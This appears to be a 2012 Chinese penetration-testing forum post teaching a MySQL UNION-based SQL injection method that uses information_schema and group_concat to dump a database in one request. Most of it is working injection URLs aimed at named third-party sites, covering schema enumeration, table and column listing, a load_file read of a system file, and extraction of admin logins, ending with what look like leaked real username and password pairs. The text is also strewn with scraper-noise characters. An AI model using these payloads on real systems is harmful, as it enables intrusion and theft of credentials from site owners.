中国网络渗透测试联盟

标题: mysql注入高效方法 [打印本页]

作者: admin    时间: 2012-9-13 16:37
标题: mysql注入高效方法
此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似( S- z! Q7 [. J) H* r
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
5 J0 U4 k2 e: F+ G1 X. G% {/ r, L- U; F8 [! Z7 b# |. E9 l

$ B9 R. U# v' n7 g" A优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入" |/ w* d8 j- ]3 L; A
1 B% ]4 Y7 U( q# D/ Y3 n
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
" f8 J5 Y" ]1 e" C
. O! p% n" u5 ^& k: r7 x; _下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示* T9 c: I. ]( K: ?& X- i: y% s4 u' e; E
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ ,  + 等等
* \/ i2 C& E  y$ h. _6 T* Y% ^+ W+ F- y9 f! p! D: F
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,175 I) g1 y: ^/ `

( j  H3 X( B, m  g  R& |读出所有库:
$ \, I) k& ]2 d; z. f5 shttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA9 Z( ~+ y0 E+ l: ~7 o

( o/ p, w/ J$ E$ i+ P6 z$ _/ c$ N  }& X. y

! v. G, S! f' m读出所有表:
8 h" d  `- Z* M: `% h7 A, Z5 Z- bhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()* Q+ {; O; c& I! T; T  k# E

) f! d% ]  W; y7 o" X2 ~% l( a& g读出所有表字段:& \$ ?) S4 v" t1 D4 M6 S8 h
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
* w5 s  q- m1 Q+ A4 s: z$ n! x9 w*/ (97,100,109,105,110)为admin的ascii码 依次类推/ L; M; m, M$ W* `3 Z8 x
8 _& Y: e7 ?) C: S4 N* z4 ~# r+ T
读出所有表字段里的内容:
; ?2 p: a/ q9 `0 N* Vhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin) M1 t- ^( f  O+ d
8 l6 U" M" F; Y. o

3 `+ {4 _% }8 m& P' h, _/ _& v! M6 Q+ Z- ?3 G4 V4 J& O

+ `4 X* L. G, L/ y
$ P0 ~8 {0 {2 x+ O1 E7 n( w, h7 }4 g6 X1 m2 X" ?
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
2 |2 ^- D. X& F3 N$ o3 k5 ~- v5 I& `6 M

- ~! b5 l1 p& S' n% [http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23( k, a8 K. P5 q

5 m) h1 w6 @4 Ghttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%233 E- q, p8 |! M! W" V
$ t# b( Y. J6 @& E' H8 E
7 Y$ W- c( e6 v+ ~" \
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%237 O. E6 Z6 ]  o+ p
3 L, R" z+ K% M- h
% F+ Q" V! P- M1 k9 B
        webmaster:dzb521123,simlab:simadmin20043233
. G7 w) m% f; r9 V+ V




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2